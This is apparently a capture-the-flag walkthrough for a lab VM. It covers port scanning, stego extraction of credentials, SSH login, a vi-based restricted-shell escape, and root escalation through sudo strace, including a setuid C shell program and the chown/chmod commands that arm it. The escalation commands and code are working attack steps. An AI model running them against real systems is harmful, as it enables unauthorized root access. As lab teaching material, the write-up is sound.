Using nmap to do a port scan

nmap -p 1-65535 -T4 -A -v 192.168.227.157

Check its HTTP service (port 31337).

Download key_is_h1dd3n.jpg and check it with binwalk and exiftool, but get nothing. Try whether it carries a steganographic payload.

Extract a h1dd3n.txt using the key “h1dd3n”.

The content of the txt file looks like brainfuck; decode it here: https://www.splitbrain.org/_static/ook/

Looks like a pair of credentials. Username: ud64, password: 1M!#64@ud

Log in to its sshd service (port 1337).

The shell is restricted; hit TAB twice to see the commands I am allowed to execute.

vi is always our best friend for escaping a restricted shell environment.

vi -> !/bin/bash -> escaped.

sysud64 is just strace. Google “strace suid local privilege escalation” and get this:

Path 1

sudo strace -o/dev/null /bin/bash

Path 2

Write a C program:

#include <stdlib.h>
#include <unistd.h>

int main(void) {
    // Only effective once the binary is owned by root and has the setuid bit
    // (the two sudo strace commands below arrange that); setuid(0) then makes
    // the real uid root and the spawned shell inherits it.
    setuid(0);
    system("/bin/bash");
    return 0;
}

Compile it, then:

sudo strace chown root:root test
sudo strace chmod u+s test
./test
